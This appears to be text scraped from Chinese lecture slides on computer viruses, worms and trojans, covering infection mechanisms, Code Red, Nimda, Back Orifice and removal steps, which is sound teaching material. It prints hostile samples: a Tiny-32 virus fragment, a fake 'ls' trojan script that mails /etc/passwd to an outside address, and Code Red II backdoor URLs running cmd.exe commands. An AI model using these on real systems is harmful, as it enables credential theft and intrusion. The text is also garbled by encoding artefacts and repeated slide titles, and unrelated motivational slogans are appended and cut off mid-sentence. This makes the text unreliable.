計(jì)算機(jī)病毒蠕蟲和特洛伊木馬介紹課件

計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬1提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬提綱計(jì)算機(jī)病毒2計(jì)算機(jī)病毒病毒結(jié)構(gòu)模型病毒的分類引導(dǎo)型病毒文件型病毒宏病毒病毒舉例病毒防范計(jì)算機(jī)病毒病毒結(jié)構(gòu)模型3計(jì)算機(jī)病毒的結(jié)構(gòu)傳染條件判斷傳染代碼表現(xiàn)及破壞條件判斷破壞代碼傳染模塊表現(xiàn)模塊計(jì)算機(jī)病毒的結(jié)構(gòu)傳染條件判斷傳染代碼表現(xiàn)及破壞條件判斷破壞代4計(jì)算機(jī)病毒的分類按攻擊平臺(tái)分類：DOS,Win32，MAC，Unix按危害分類：良性、惡性按代碼形式：源碼、中間代碼、目標(biāo)碼按宿主分類：引導(dǎo)型主引導(dǎo)區(qū)操作系統(tǒng)引導(dǎo)區(qū)文件型操作系統(tǒng)應(yīng)用程序宏病毒計(jì)算機(jī)病毒的分類按攻擊平臺(tái)分類：DOS,Win32，MAC，5引導(dǎo)型病毒—引導(dǎo)記錄主引導(dǎo)記錄（MBR）55AA主引導(dǎo)程序(446字節(jié))分區(qū)1(16字節(jié))主分區(qū)表(64字節(jié)）分區(qū)2(16字節(jié))分區(qū)3(16字節(jié))分區(qū)4(16字節(jié))結(jié)束標(biāo)記（2字節(jié)）引導(dǎo)代碼及出錯(cuò)信息A引導(dǎo)型病毒—引導(dǎo)記錄主引導(dǎo)記錄（MBR）55AA主引導(dǎo)程序(6引導(dǎo)型病毒——系統(tǒng)引導(dǎo)過程PowerOnCPU&ROMBIOSInitializesPOSTTestsLookforbootdeviceMBRbootPartitionTableLoadDOSBootSectorRunsLoadsIO.SYSMSDOS.SYSDOSLoaded引導(dǎo)型病毒——系統(tǒng)引導(dǎo)過程PowerOnCPU&ROM7引導(dǎo)型病毒—感染與執(zhí)行過程系統(tǒng)引導(dǎo)區(qū)引導(dǎo)正常執(zhí)行病毒病毒執(zhí)行病毒駐留帶毒執(zhí)行。。。。。病毒引導(dǎo)系統(tǒng)病毒體。。。引導(dǎo)型病毒—感染與執(zhí)行過程系統(tǒng)引導(dǎo)區(qū)引導(dǎo)病毒病毒執(zhí)行病毒駐留8病毒的激活過程空閑區(qū)。內(nèi)存空間病毒進(jìn)入int8int21int2Fint4A時(shí)鐘中斷處理DOS中斷處理外設(shè)處理中斷實(shí)時(shí)時(shí)種警報(bào)中斷空閑區(qū)帶病毒程序空閑區(qū)空閑區(qū)正常程序病毒int8int8。int8。int8int8int8int8int8int8int8int8int8int8。int8int8空閑區(qū)正常程序正常程序。正常程序正常程序int8是26日？是,破壞！int8病毒的激活過程空閑區(qū)。內(nèi)存空間病毒進(jìn)入int8int21in9……舉例—小球病毒（BouncingBall)在磁盤上的存儲(chǔ)位置文件分配表病毒的第二部分……000號(hào)扇區(qū)001號(hào)扇區(qū)第一個(gè)空簇FF7正常的引導(dǎo)扇區(qū)正常的引導(dǎo)扇區(qū)病毒的第一部分…舉例—小球病毒（BouncingBall)在磁盤上的存儲(chǔ)10感染后的系統(tǒng)啟動(dòng)過程啟動(dòng)將病毒程序的第一部分送入內(nèi)存高端將第二部分裝入內(nèi)存，與第一部分拼接在一起讀入真正的Boot區(qū)代碼，送到0000:TC00處修改INT13中斷向量，指向病毒轉(zhuǎn)移到0000:TC00處，開始真正的系統(tǒng)引導(dǎo)感染后的系統(tǒng)啟動(dòng)過程啟動(dòng)將病毒程序的第一部分送入內(nèi)存高端將第11觸發(fā)條件－－修改后的INT13進(jìn)入INT13中斷是否為讀盤？執(zhí)行正常的INT13程序執(zhí)行正常的INT13程序N所讀盤是否是自身？Y修改INT8開始發(fā)作Y是否整點(diǎn)或半點(diǎn)Y執(zhí)行正常的INT13程序Y是否帶病毒？N調(diào)用傳染過程感染磁盤N不發(fā)作執(zhí)行正常的INT13程序N觸發(fā)條件－－修改后的INT13進(jìn)入INT13中斷是否為讀12病毒檢測(cè)原理特征匹配例如，在香港病毒:1F58EA1AAF00F09C:POPAXJMPF000∶AF1APUSHF行為監(jiān)控對(duì)中斷向量表的修改對(duì)引導(dǎo)記錄的修改對(duì).exe,.com文件的寫操作駐留內(nèi)存軟件模擬病毒檢測(cè)原理特征匹配13防范與檢測(cè)數(shù)據(jù)備份不要用移動(dòng)介質(zhì)啟動(dòng)（設(shè)置CMOS選項(xiàng)）設(shè)置CMOS的引導(dǎo)記錄保護(hù)選項(xiàng)安裝補(bǔ)丁，并及時(shí)更新安裝防病毒軟件，及時(shí)更新病毒定義碼限制文件共享不輕易打開電子郵件的附件沒有病毒處理前不要使用其他移動(dòng)介質(zhì)不要運(yùn)行不可信的程序移動(dòng)介質(zhì)寫保護(hù)防范與檢測(cè)數(shù)據(jù)備份14文件型病毒—文件結(jié)構(gòu).COM文件 .EXE文件PSPHeader(256bytes)Code,Data,StackSegment(s)(64KBytes)代碼、數(shù)據(jù)、堆棧在通一段中在內(nèi)存中的.COM是磁盤文件的鏡像PSPHeader(512bytes)CodeSegment(s)(64K)DataSegment(s)(64K)StackSegment(s)(64K)文件型病毒—文件結(jié)構(gòu).COM文件 .EXE文件PSP15其他可執(zhí)行的文件類型.BAT.PIF.SYS.DRV.OVR.OVL.DLL.VxD其他可執(zhí)行的文件類型.BAT16正常程序正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭正常程序程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序頭程序頭病毒程序程序頭病毒程序程序頭病毒程序程序頭病毒程序程序頭病毒程序程序頭病毒程序病毒程序病毒程序病毒程序正常程序程序頭程序頭文件型病毒感染機(jī)理正常程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程序頭程17文件型病毒舉例最簡(jiǎn)單的病毒Tiny-32(32bytes)尋找宿主文件打開文件把自己寫入文件關(guān)閉文件MOVAH,4E ;setuptofindafileINT21 ;findthehostfileMOVAX,3D02 ;setuptoopenthehostfileINT21 ;openhostfileMOVAH,40 ;setuptowritefiletodiskINT21 ;writetofileDB*.COM ;whatfilestolookfor文件型病毒舉例最簡(jiǎn)單的病毒Tiny-32(32bytes)18宏病毒（MacroVirus）歷史：1980年，Dr.FredrickCohenandRalfBurger論文1994年，MicrosoftWord第一例宏病毒W(wǎng)ord,Excel,Access,PowerPoint,Project,LotusAmiPro,Visio,Lotus1-2-3,AutoCAD,CorelDraw.使用數(shù)據(jù)文件進(jìn)行傳播，使得反病毒軟件不再只關(guān)注可執(zhí)行文件和引導(dǎo)區(qū)DOEViRT統(tǒng)計(jì)，85%的病毒感染歸因于宏病毒易于編寫，只需要一兩天的時(shí)間，10－15行代碼大量的用戶：90MillionMSOfficeUsers人們通常不交換程序，而交換數(shù)據(jù)宏病毒（MacroVirus）歷史：19宏病毒工作機(jī)理有毒文件.docNormal.dot激活autoopen宏寫入無毒文件.docNormal.dot啟動(dòng)激活病毒宏病毒工作機(jī)理有毒文件.docNormal.dot激活aut20注意事項(xiàng)Macro可以存在模板里，也可以存在文檔里RTF文件也可以包含宏病毒通過IE瀏覽器可以直接打開，而不提示下載注意事項(xiàng)Macro可以存在模板里，也可以存在文檔里21提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬提綱計(jì)算機(jī)病毒22蠕蟲（Worm）一個(gè)獨(dú)立的計(jì)算機(jī)程序，不需要宿主自我復(fù)制，自主傳播（Mobile）占用系統(tǒng)或網(wǎng)絡(luò)資源、破壞其他程序不偽裝成其他程序，靠自主傳播利用系統(tǒng)漏洞；利用電子郵件（無需用戶參與）蠕蟲（Worm）一個(gè)獨(dú)立的計(jì)算機(jī)程序，不需要宿主23莫里斯蠕蟲事件發(fā)生于1988年，當(dāng)時(shí)導(dǎo)致大約6000臺(tái)機(jī)器癱瘓主要的攻擊方法Rsh，rexec：用戶的缺省認(rèn)證Sendmail的debug模式Fingerd的緩沖區(qū)溢出口令猜測(cè)莫里斯蠕蟲事件發(fā)生于1988年，當(dāng)時(shí)導(dǎo)致大約6000臺(tái)機(jī)器癱24CRI主要影響WindowsNT系統(tǒng)和Windows2000主要影響國(guó)外網(wǎng)絡(luò)據(jù)CERT統(tǒng)計(jì)，至8月初已經(jīng)感染超過25萬臺(tái)主要行為利用IIS的Index服務(wù)的緩沖區(qū)溢出缺陷進(jìn)入系統(tǒng)檢查c:\notworm文件是否存在以判斷是否感染中文保護(hù)（是中文windows就不修改主頁(yè)）攻擊白宮！CRI主要影響WindowsNT系統(tǒng)和Windows225CRIIInspiredbyRCI影響波及全球國(guó)內(nèi)影響尤其廣泛主要行為所利用缺陷相同只感染windows2000系統(tǒng)，由于一些參數(shù)的問題，只會(huì)導(dǎo)致NT死機(jī)休眠與掃描：中文windows，600個(gè)線程CRIIInspiredbyRCI26Nimda簡(jiǎn)介影響系統(tǒng)：MSwin9x,wind2k,winXP傳播途徑：Email、文件共享、頁(yè)面瀏覽、MSIIS目錄遍歷、CodeRed后門影響群發(fā)電子郵件，付病毒掃描共享文件夾，掃描有漏洞的IIS,掃描有CodeRed后門的IISServerNimda簡(jiǎn)介影響系統(tǒng)：MSwin9x,wind2k,27紅色代碼病毒紅色代碼病毒是一種結(jié)合了病毒、木馬、DDOS機(jī)制的蠕蟲。2001年7月中旬，在美國(guó)等地大規(guī)模蔓延。2001年8月初，出現(xiàn)變種coderedII，針對(duì)中文版windows系統(tǒng)，國(guó)內(nèi)大規(guī)模蔓延。通過80端口傳播。只存在與網(wǎng)絡(luò)服務(wù)器的內(nèi)存，不通過文件載體。利用IIS緩沖區(qū)溢出漏洞（2001年6月18日發(fā)布）紅色代碼病毒紅色代碼病毒是一種結(jié)合了病毒、木馬、DDOS機(jī)制28CodeRedI在侵入一臺(tái)服務(wù)器后，其運(yùn)行步驟是：設(shè)置運(yùn)行環(huán)境，修改堆棧指針，設(shè)置堆棧大小為218h字節(jié)。接著使用RVA（相對(duì)虛擬地址）查找GetProcAddress的函數(shù)地址，然后就獲得其他socket、connect、send、recv、closesocket等函數(shù)地址；如果C:\notworm在，不再進(jìn)一步傳染；傳染其他主機(jī)。創(chuàng)造100個(gè)線程，其中99個(gè)用戶感染其他WEB服務(wù)器，被攻擊IP通過一個(gè)算法計(jì)算得出；篡改主頁(yè)，如果系統(tǒng)默認(rèn)語言為“美國(guó)英語”，第100個(gè)進(jìn)程就將這臺(tái)服務(wù)的主頁(yè)改成“Welcometo!,HackedByChinese!”，并持續(xù)10個(gè)小時(shí)。（這個(gè)修改直接在內(nèi)存中修改，而不是修改*.htm文件）；如果時(shí)間在20：00UTC和23：59UTC之間，將反復(fù)和白宮主頁(yè)建立連接，并發(fā)送98k字節(jié)數(shù)據(jù)，形成DDOS攻擊。CodeRedI在侵入一臺(tái)服務(wù)器后，其運(yùn)行步驟是：29CodeRedII增加了特洛依木馬的功能，并針對(duì)中國(guó)網(wǎng)站做了改進(jìn)計(jì)算IP的方法進(jìn)行了修改，使病毒傳染的更快；檢查是否存在CodeRedII原子，若存在則進(jìn)入睡眠狀態(tài)防止反復(fù)感染，若不存在則創(chuàng)建CodeRedII原子；創(chuàng)建300個(gè)線程進(jìn)行傳染，若系統(tǒng)默認(rèn)語言為簡(jiǎn)體中文或繁體中文，則創(chuàng)建600個(gè)線程；檢查時(shí)間。病毒作者的意圖是傳播過程在2001年10月1日完成，之后，蠕蟲會(huì)爆發(fā)而使系統(tǒng)不斷重新啟動(dòng)。在系統(tǒng)中安裝一個(gè)特洛依木馬：拷貝系統(tǒng)目錄cmd.exe到IIS的腳本執(zhí)行目錄下，改名為root.exe；將病毒體內(nèi)的木馬解壓縮寫到C盤和D盤的explorer.exe木馬每次系統(tǒng)和啟動(dòng)都會(huì)運(yùn)行，禁止系統(tǒng)的文件保護(hù)功能，并將C盤和D盤通過web服務(wù)器共享CodeRedII增加了特洛依木馬的功能，并針對(duì)中國(guó)網(wǎng)站做30CodeRedII攻擊形式http://x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp://x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻擊的IP地址，dir可以是任意命令，比如刪除系統(tǒng)中的文件，向外發(fā)送機(jī)密數(shù)據(jù)等，這個(gè)后門后來也成為了nimda病毒的一個(gè)傳播模式。 下面是cert/cc上提供的被攻擊服務(wù)器日志(CA-2001-11)2001-05-0612:20:190-080GET/scripts/../../winnt/system32/cmd.exe/c+dir200–2001-05-0612:20:190-080GET/scripts/../../winnt/system32/cmd.exe/c+dir+..\200–CodeRedII攻擊形式31紅色代碼病毒的檢測(cè)和防范針對(duì)安裝IIS的windows系統(tǒng)；是否出現(xiàn)負(fù)載顯著增加（CPU/網(wǎng)絡(luò)）的現(xiàn)象；用netstat–an檢查是否有許多對(duì)外的80端口連接在web日志中檢查是否有/default.ida?xxx..%u0078%u0000％u00=aHTTP/1.0這樣的攻擊記錄；查找系統(tǒng)中是否存在文件c:\explorer.exe或d:\explorer.exe以及root.exe；檢查注冊(cè)表文件中是否增加了C和D虛擬目錄，以及文件保護(hù)功能是否被禁止。在任務(wù)管理器中檢查是否存在兩個(gè)explorer.exe進(jìn)程。紅色代碼病毒的檢測(cè)和防范針對(duì)安裝IIS的windows系統(tǒng)；32提綱計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬提綱計(jì)算機(jī)病毒33特洛伊木馬名字來源：古希臘故事通過偽裝成其他程序、有意隱藏自己惡意行為的程序，通常留下一個(gè)遠(yuǎn)程控制的后門沒有自我復(fù)制的功能非自主傳播用戶主動(dòng)發(fā)送給其他人放到網(wǎng)站上由用戶下載特洛伊木馬名字來源：古希臘故事34最簡(jiǎn)單的木馬舉例ls#!/bin/sh/bin/mailmyaddress@</etc/passwdlsPATH=./:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin最簡(jiǎn)單的木馬舉例lsPATH=./:/usr/local/35特洛依木馬舉例BackOrificeCultoftheDeadCow在1998年8月發(fā)布,公開源碼軟件，遵守GPL，是功能強(qiáng)大的遠(yuǎn)程控制器木馬。boserver.exe、boconfig.exe、bogui.exe在BO服務(wù)器上啟動(dòng)、停止基于文本的應(yīng)用程序目錄和文件操作。包括創(chuàng)建、刪除、查看目錄、查找、解壓、壓縮。共享。創(chuàng)建共享資源HTTP服務(wù)。啟動(dòng)或停止HTTP服務(wù)。擊鍵記錄。將BO服務(wù)器上用戶的擊鍵記錄在一個(gè)文本文件中，同時(shí)記錄執(zhí)行輸入的窗口名。（可以獲得用戶口令）特洛依木馬舉例BackOrifice36特洛依木馬視頻輸入、播放。捕捉服務(wù)器屏幕到一個(gè)位圖文件中。網(wǎng)絡(luò)連接。列出和斷開BO服務(wù)器上接入和接出的連接，可以發(fā)起新連接。查看信息。查看所有網(wǎng)絡(luò)端口、域名、服務(wù)器和可見的共享“出口”。返回系統(tǒng)信息，包括機(jī)器名、當(dāng)前用戶、CPU類型、內(nèi)存容量及可用內(nèi)存、Windows版本、驅(qū)動(dòng)器類型、硬盤容量及使用空間。端口重定向。注冊(cè)表鎖住或重啟計(jì)算機(jī)。傳輸文件特洛依木馬視頻輸入、播放。捕捉服務(wù)器屏幕到一個(gè)位圖文件中。37特洛依木馬使用netstat–a檢查是否還有未知端口監(jiān)聽(默認(rèn)31337)檢測(cè)和刪除注冊(cè)表HLM\software\microsoft\windows\currentVersion\runservices鍵值，是否有“NameData.exe”，若有則刪除C:\windows\system目錄： 刪除“.exe”文件和windll.dll文件特洛依木馬使用netstat–a檢查是否還有未知端口監(jiān)聽38特洛依木馬其他木馬國(guó)外subsever、dagger、ACKcmdC、DeepThroat、SatansBackdoor等國(guó)內(nèi)（更常見）冰河、廣外女生、netspy、黑洞等特洛依木馬其他木馬39刪除木馬的通用方法Win.ini文件 [windows]節(jié)中run=和load＝system.ini文件 [boot]節(jié)的shell=explorer.exeAutoexec.bat文件 win命令注冊(cè)表 HLM\software\microsoft\windows\currentversion\run HCU\software\microsoft\windows\currentversion\runonce HCR\exefile\shell\open\command“%1”%* HCU\controlpanel\desktop\wallpaper刪除木馬的通用方法Win.ini文件40更高級(jí)的木馬技術(shù)服務(wù)器端程序文件的隱藏問題：磁盤上的文件、系統(tǒng)中的進(jìn)程木馬：DLL陷阱防范：DLL簽名技術(shù)隱藏端口監(jiān)聽寄生：選擇一個(gè)已經(jīng)打開的端口，如80潛伏：不使用TCP/UDP,使用ICMP突破防火墻的限制反彈端口型木馬：更高級(jí)的木馬技術(shù)服務(wù)器端程序文件的隱藏41突破防火墻的限制:反彈端口型木馬WebServer突破防火墻的限制:反彈端口型木馬WebServer42病毒、蠕蟲與木馬的比較特性病毒蠕蟲木馬宿主需要不需要需要表現(xiàn)形式不以文件形式存在獨(dú)立的文件偽裝成其他文件傳播方式依賴宿主文件或介質(zhì)自主傳播依靠用戶主動(dòng)傳播主要危害破壞數(shù)據(jù)完整性、系統(tǒng)完整性侵占資源留下后門，竊取信息傳播速度快極快慢病毒、蠕蟲與木馬的比較特性病毒蠕蟲木馬宿主需要不需要需要表現(xiàn)43提綱網(wǎng)絡(luò)攻擊方法竊聽口令破解端口掃描和信息收集緩沖區(qū)溢出漏洞掃描拒絕服務(wù)惡意移動(dòng)代碼計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬其他惡意代碼提綱網(wǎng)絡(luò)攻擊方法44

1、用愛心來做事，用感恩的心做人。

2、人永遠(yuǎn)在追求快樂，永遠(yuǎn)在逃避痛苦。

3、有多大的思想，才有多大的能量。

4、人的能量=思想+行動(dòng)速度的平方。

5、勵(lì)志是給人快樂，激勵(lì)是給人痛苦。

6、成功者絕不給自己軟弱的借口。

7、你只有一定要，才一定會(huì)得到。

8、決心是成功的開始。

9、當(dāng)你沒有借口的那一刻，就是你成功的開始。

10、命運(yùn)是可以改變的。

11、成功者絕不放棄。

12、成功永遠(yuǎn)屬于馬上行動(dòng)的人。

13、下定決心一定要，才是成功的關(guān)鍵。

14、成功等于目標(biāo)，其他都是這句話的注解。

15、成功是一個(gè)過程，并不是一個(gè)結(jié)果。

16、成功者學(xué)習(xí)別人的經(jīng)驗(yàn)，一般人學(xué)習(xí)自己的經(jīng)驗(yàn)。

17、只有第一名可以教你如何成為第一名。

18、學(xué)習(xí)需要有計(jì)劃。

19、完全照成功者的方法來執(zhí)行。

20、九十九次的理論不如一次的行動(dòng)來得實(shí)際。

21、一個(gè)勝利者不會(huì)放棄，而一個(gè)放棄者永遠(yuǎn)不會(huì)勝利。

22、信心、毅力、勇氣三者具備，則天下沒有做不成的事。23、如果你想得到，你就會(huì)得到，你所需要付出的只是行動(dòng)。

24、一個(gè)缺口的杯子，如果換一個(gè)角度看它，它仍然是圓的。

25、對(duì)于每一個(gè)不利條件，都會(huì)存在與之相對(duì)應(yīng)的有利條件。

26、一個(gè)人的快樂，不是因?yàn)樗麚碛械亩啵撬?jì)較的少。

27、世間成事，不求其絕對(duì)圓滿